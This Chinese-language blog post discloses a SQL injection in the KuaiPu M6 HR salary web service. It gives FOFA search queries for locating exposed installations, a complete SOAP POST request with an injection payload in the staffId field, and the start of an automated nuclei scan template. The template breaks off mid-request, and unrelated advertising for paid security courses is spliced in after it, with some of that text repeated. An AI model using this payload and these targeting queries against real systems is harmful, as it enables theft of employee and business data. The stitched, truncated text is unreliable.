快普M6SalaryAccounting接口存在SQL注入_salaryaccounting(1)

最新推荐文章于 2024-08-20 20:45:00 发布

2401_84969291

最新推荐文章于 2024-08-20 20:45:00 发布

阅读量361

点赞数 3

分类专栏：程序员文章标签： sql 数据库

本文链接：https://blog.csdn.net/2401_84969291/article/details/138867396

版权

程序员专栏收录该内容

30 篇文章 0 订阅

订阅专栏

中华人民共和国网络安全法

第二十七条规定

任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动；不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具；明知他人从事危害网络安全的活动的，不得为其提供技术支持、广告推广、支付结算等帮助。

0x01、概述

基本信息：

快普M6pro产品主要解决这些行业的集成管理、销售管理、运维管理、租赁管理、协同办公管理和供应链财务管理等管理需求，建立可持续发展的经营管理模式，彻底消除信息孤岛和管理死角。

漏洞描述：

快普M6 的 /WebService/HR/Salary/SalaryAccounting.asmx 接口处存在SQL注入漏洞，攻击者可以窃取用户的隐私信息、业务数据等，造成用户信息泄露、企业品牌受损、法律风险等相关安全问题。

0x02、资产测绘

FOFA：


body=“Resource/JavaScript/jKPM6.DateTime.js”
app=“快普-M6”

0x03、漏洞复现

3.1、抓包测试

POST请求包：

POST /WebService/HR/Salary/SalaryAccounting.asmx HTTP/1.1
Host: host
SOAPAction: http://tempuri.org/Calculate
Content-Type: text/xml;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.88 Safari/537.36
Content-Length: 636

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
 <soapenv:Header/>
 <soapenv:Body>
   <tem:Calculate>
    <!--type: string-->
    <tem:SalaryCategory></tem:SalaryCategory>
    <!--type: string-->
    <tem:StaffBirthDay></tem:StaffBirthDay>
    <!--type: string-->
    <tem:staffId> 1) and 1=@@version--+  </tem:staffId>
    <!--type: string-->
    <tem:Department></tem:Department>
    <!--type: string-->
    <tem:SubOrg></tem:SubOrg>
    <!--type: string-->
    <tem:taxMonthly></tem:taxMonthly>
   </tem:Calculate>
 </soapenv:Body>
</soapenv:Envelope>

测试截图

3.2、sqlmap测试


08984fb90631634f25f857c31bcf64d4.png


e9d9df42852049dda331a302345243dc.png

3.3、自动化脚本

id: kuaipu_vuln_sql

info:
  name: kuaipu_vuln_sql
  author: zq
  severity: high
  description: SalaryAccounting.asmx存在SQL注入漏洞
  metadata:
    max-request: 1


requests:
- raw:
  - |
    POST /WebService/HR/Salary/SalaryAccounting.asmx HTTP/1.1
    Host: {{Hostname}}
    SOAPAction: http://tempuri.org/Calculate
    Content-Type: text/xml;charset=UTF-8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.88 Safari/537.36

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
     <soapenv:Header/>
     <soapenv:Body>
       <tem:Calculate>
        <!--type: string-->
        <tem:SalaryCategory></tem:SalaryCategory>
        <!--type: string-->
        <tem:StaffBirthDay></tem:StaffBirthDay>
        <!--type: string-->
## 最后

**自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。**

**深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！**

**因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**

![img](https://img-blog.csdnimg.cn/img_convert/4eb44e533ac10aa097baacf7ba3dac71.png)

![img](https://img-blog.csdnimg.cn/img_convert/de6fe65be78240ef26099fd36f025ac0.png)

![img](https://img-blog.csdnimg.cn/img_convert/ef78126afec94073882eca108bc13c66.png)

![img](https://img-blog.csdnimg.cn/img_convert/6968868ed8cf8f978525a93fe9cac852.png)

![img](https://img-blog.csdnimg.cn/img_convert/9aef500b3d0fcbfbb6b5145ca3566e98.png)

 

**既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点！真正的体系化！**

[**如果你觉得这些内容对你有帮助，需要这份全套学习资料的朋友可以戳我获取！！**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大，这里只是将部分目录截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且会持续更新！**

网络安全知识点！真正的体系化！**

[**如果你觉得这些内容对你有帮助，需要这份全套学习资料的朋友可以戳我获取！！**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大，这里只是将部分目录截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且会持续更新！**

2401_84969291

关注

3
点赞
踩
6

收藏

觉得还不错? 一键收藏
0
评论
快普M6SalaryAccounting接口存在SQL注入_salaryaccounting(1)

快普M6pro产品主要解决这些行业的集成管理、销售管理、运维管理、租赁管理、协同办公管理和供应链财务管理等管理需求，建立可持续发展的经营管理模式，彻底消除信息孤岛和管理死角。快普M6 的 /WebService/HR/Salary/SalaryAccounting.asmx 接口处存在SQL注入漏洞，攻击者可以窃取用户的隐私信息、业务数据等，造成用户信息泄露、企业品牌受损、法律风险等相关安全问题。
复制链接

扫一扫